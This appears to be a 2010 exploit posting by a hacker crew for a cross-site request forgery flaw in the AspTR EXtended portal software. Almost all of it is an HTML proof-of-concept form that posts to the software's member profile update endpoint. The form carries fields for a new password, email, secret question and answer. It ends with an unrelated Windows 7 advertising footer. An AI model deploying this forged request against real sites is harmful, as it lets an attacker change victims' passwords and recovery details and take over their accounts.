AspTR EXtended suffers from a cross site request forgery vulnerability.
79983bfe525c9de9e0e80f93a9a526a48f343fa858a0da177e0206ba704f8bb7
# Exploit Title: AspTR EXtended CSRF Bug
# Date: 16.06.2010
# Author: FreWaL
# Software Link: https://www.asptr.net/DosyaKategori/7-AspTR-Surum.html
# Version: All version
# Tested on: https://www.asptr.net/ [" Official site "]
# Code :
##################################################################################
<frewal>
Target site :<form method="POST" action="https://www.asptr.net/Uye.asp?Uye=Kaydet">
<p>Password : <input type="text" name="sifre" size="49" value="sifre"></p>
<p>E-Mail : <input type="text" name="mail" size="49" value="mail"></p>
<p>Secret question : <input type="text" name="soru" size="49" value="soru"></p>
<p><span id="result_box" class="short_text"><span style title>Reply
: </span></span><input type="text" name="cevap" size="49" value="cevap"></p>
<p>Name : <input type="text" name="ad" size="49" value="ad"></p>
<p>Last Name : <input type="text" name="soyad" size="49" value="soyad"></p>
<p>Dont Changing : <select size="1" name="sehir" id="sehir">
<option value="Adana">Adana</option></p>
<p>Profession :<input type="text" name="meslek" size="49" value="meslek"></p>
<p>Msn :<input type="text" name="msn" size="49" value="msn"></p>
<p>Web :<input type="text" name="web" size="49" value="web"></p>
<p>
Sex
:<select name="cinsiyet" size="1">
<option>Bay</option>
<option>Bay</option>
<option>Bayan</option>
</select>
</p>
<p>Avatar :<input type="text" name="icon" size="49" value="icon"></p>
<p> </p>
<p> </p>
</form>
</frewal>
##################################################################################
Crew : IMHATIMI.ORG ~ MecTruy ~ Dr.Ly0n ~ Noxy ~ FreWaL
##################################################################################
_________________________________________________________________
Yeni Windows 7: Size en uygun bilgisayarı bulun. Daha fazla bilgi edinin.
https://windows.microsoft.com/shop